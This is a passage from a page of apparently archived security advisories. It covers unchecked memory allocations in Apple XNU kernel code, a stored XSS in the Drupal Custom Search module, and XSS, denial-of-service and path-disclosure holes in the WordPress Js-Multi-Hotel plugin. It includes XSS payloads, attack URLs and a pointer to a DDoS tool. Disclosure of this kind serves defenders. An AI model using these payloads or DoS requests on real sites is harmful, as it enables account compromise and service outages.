    return (add_name_internal(name, len, hashval, FALSE, flags));  <== CALL
 
}
--- vfs_cache.c ----------------------------
 
And invalid memory reference in add_name_internal()
 
--- vfs_cache.c ----------------------------
static const char *
add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t
need_extra_ref, __unused u_int flags)
{
    struct stringhead *head;
    string_t          *entry;
    uint32_t          chain_len = 0;
    uint32_t      hash_index;
        uint32_t      lock_index;
    char              *ptr;
 
    /*
     * if the length already accounts for the null-byte, then
     * subtract one so later on we don't index past the end
     * of the string.
     */
    if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE
        len--;
    }
    if (hashval == 0) {
        hashval = hash_string(name, len);
    }
--- vfs_cache.c ----------------------------
 
 
-3.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not
only
 
Please pay attention that a buffer length check (stored in some variable)
should be performed; also return from *alloc() function family should be
verified for possible NULL pointers.
Here are a few FALSE / POSITIVE examples.
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c
 
--- hfs_catalog.c ----------------------------
 /*
 * builddesc - build a cnode descriptor from an HFS+ key
 */
static int
builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint,
u_int32_t encoding,
    int isdir, struct cat_desc *descp)
{
    int result = 0;
    unsigned char * nameptr;
    size_t bufsize;
    size_t utf8len;
    unsigned char tmpbuff[128];
 
    /* guess a size... */
    bufsize = (3 * key->nodeName.length) + 1;
    if (bufsize >= sizeof(tmpbuff) - 1) { <============================
        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <=
MALLOC FAIL
    } else {
        nameptr = &tmpbuff[0];
    }
 
    result = utf8_encodestr(key->nodeName.unicode,
            key->nodeName.length * sizeof(UniChar),
            nameptr, (size_t *)&utf8len, <============================
 
...
    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) /
SMALL_DIRENTRY_SIZE));
bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);
if (extended) {
bufsize += 2*sizeof(struct direntry);
}
MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);
<============================
bzero(buffer, bufsize);
...
FREE(nameptr, M_TEMP);
MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <==============
 
result = utf8_encodestr(key->nodeName.unicode,
                        key->nodeName.length * sizeof(UniChar),
                        nameptr, (size_t *)&utf8len,
                        bufsize, ':', 0);
}
 ...
cnp = (const CatalogName *)&ckp->hfsPlus.nodeName;
bufsize = 1 + utf8_encodelen(cnp->ustr.unicode,
                             cnp->ustr.length * sizeof(UniChar),
                             ':', 0);
MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <========
result = utf8_encodestr(cnp->ustr.unicode,
                        cnp->ustr.length * sizeof(UniChar),
                        new_nameptr, &tmp_namelen, bufsize, ':', 0);
 
--- hfs_catalog.c ----------------------------
 
The above examples does not look nice, too. Are you among them is the crux
of the problem applications and kernel crash?
I informed Apple of those possible errors, it has passed more than a month
and I still have not received any comment nor solution.
 
 
--- 1. References ---
http://cxsecurity.com/issue/WLB-2014040027
http://cxsecurity.com/cveshow/CVE-2013-6799/
http://cxsecurity.com/cveshow/CVE-2010-0105/
 
 
--- 2. Greetz ---
Kacper George and Michal
 
 
--- 3. Credit ---
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
http://cert.cx/
 
Best regards,
CXSEC TEAM
http://cxsec.org/

(261)

3Apr/140

Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
- -----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels before display.
 
 
Systems affected:
- -----------------
Drupal 7.26 with Custom Search 7.x-1.13 was tested and shown to be
vulnerable
 
 
Impact
- ------
Users can inject arbitrary HTML (including JavaScript) in order to
attack site users, including administrative users.  This could lead to
account compromise, which could in turn lead to web server compromise,
or expose administrative users to client side malware attacks.
 
 
Mitigating factors:
- -------------------
In order to inject arbitrary script malicious users must have the
ability "administer custom search."
 
 
Proof of Concept Exploits:
- -----------------
1.  Install and enable the Custom Search module
2.  Navigate the Custom Search configuration at
?q=admin/config/search/custom_search/results
3.  Change the 'Position' drop down to 'Above results'
4.  Enter "<script>alert('xss');</script>" in the 'Label text' input
field
5.  Click the 'Save Configuration' button
6.  Submit any search to view the JavaScript on the results page.
 
 
Vendor response:
- ----------------
Vulnerability is fixed in the latest versions of the Custom Search
module (ref https://drupal.org/node/2231665)
 
- -- 
Justin C. Klein Keane
http://www.MadIrish.net
 
The digital signature on this e-mail may be verified using
the public key at http://www.madirish.net/gpgkey
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
iPwEAQECAAYFAlM8n/8ACgkQkSlsbLsN1gAGXwb9FaDO4jn6RBhqOqLkvFPu3eJE
Ae+E5BEAxJ8wQpZx2dnen5hizNtN0q2o6LkDffwkEaOjZMJZIum23F8ovnxciuiA
B/vg4ZfKav+08Ac8ZJcC5FwKbz0hs6mlMR5aLGQK28PjLShEEtMUEzlfDzhAA1GK
3I3huJIUCszR5nkgYGjvxrHmCVHMEZ9f0hS5L6tfEaLKCSFtyVbM65CfdGcFnrr0
o2+YQd9NQ8NnLYe+wB2VGXgydBseQ8AdshnB6c1WTG7/lHHVqOV2f8vbr4kewoCz
PQln6M5j/UJtaMyMmds=
=Sqil
-----END PGP SIGNATURE-----

(536)

3Apr/140

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
----------
Details:
----------
 
Abuse of Functionality (WASC-42):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
 
DoS (WASC-10):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
 
Besides conducting DoS attack manually, it's also possible to conduct 
automated DoS and DDoS attacks with using of DAVOSET 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
 
DDoS attacks via other sites execution tool: 
http://websecurity.com.ua/davoset/
 
Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E
 
About XSS vulnerability in refreshDate.php in parameter roomid there was 
written earlier 
(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/js-multihotel/includes/functions.php
 
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
 
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
 
http://site/wp-content/plugins/js-multihotel/includes/widget.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
 
I wrote about these vulnerabilities at my site 
(http://websecurity.com.ua/7087/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

(421)